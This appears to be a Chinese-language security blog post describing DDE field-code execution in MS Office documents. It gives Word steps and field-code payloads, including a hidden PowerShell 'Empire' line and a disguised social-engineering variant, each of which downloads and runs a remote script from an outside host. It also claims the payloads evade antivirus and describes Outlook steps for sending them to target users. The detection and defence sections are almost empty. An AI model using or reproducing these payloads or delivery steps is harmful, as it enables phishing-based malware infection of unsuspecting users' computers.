MENU

MS Office Dynamic Data Exchange Code Exec

October 11, 2017 • Security

步骤

Insert tab -> Quick Parts -> Field

中文版:插入 -> 文档部件 -> 域

Screen-Shot-2017-08-23-at-13.49.11.png

选择= (Formula)

Screen-Shot-2017-08-23-at-13.49.22-1024x652.png

选择文字右键Toggle Field Codes(切换域代码)

Screen-Shot-2017-08-23-at-13.49.39.png

替换内容为:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

注:第一部分DDEAUTO是DDE字段提示,第二部分c:\\windows\\system32\\cmd.exe为可执行文件的路径,第三部分calc.exe为执行命令参数。

Screen-Shot-2017-08-23-at-13.50.01.png

另外还可以直接使用快捷键CTRL+F9创建一个空白的字段标识符然后直接插入DDE代码保存即可。

打开后效果如图:

Screen-Shot-2017-08-23-at-13.50.44-1024x726.png

Screen-Shot-2017-08-23-at-13.50.57-1024x613.png

Screen-Shot-2017-08-23-at-13.51.15.png

PoC

Empire Payload:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Demo:

dde.mp4

使用DDE标识也可以:

{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }

当然还可以通过社工的手段来欺骗用户:

{DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -w hidden -NonI -c IEX(New-Object System.Net.WebClient).DownloadString('http://test.com/c.ps1');c.ps1" "图片无法加载"}

1.png

免杀效果:

ScreenShot2017-08-23at14.32.20-851x1024.png

88b2c7573691224d8e19a6f09541ea8b49e6d538ae1b4858084fc898c28e8d74.png

7a446ab78417f37133bce1c1925bae5955254eb2b9c86ad89fa55fbf187d9056.png

禁用宏之后用利用DDE还可以执行PowerShell,,瑞星牛逼了...

OutLook

OutLook2013:

新建邮件-选择RTF格式-从Word中拷贝DDE payload进入邮件-然后发送给目标用户-用户点击回复邮件-利用成功

DMbBC_dXUAAd-__.jpg

OutLook2016: 需要在新建邮件里先添加一个图片,其他步骤同上

DMcwPRMUMAAbo3S.jpg

检测

YARA规则:

恶意样本

防御

修改Windows注册表在MS Office中关闭DDE:

参考

Archives QR Code
QR Code for this page
Tipping QR Code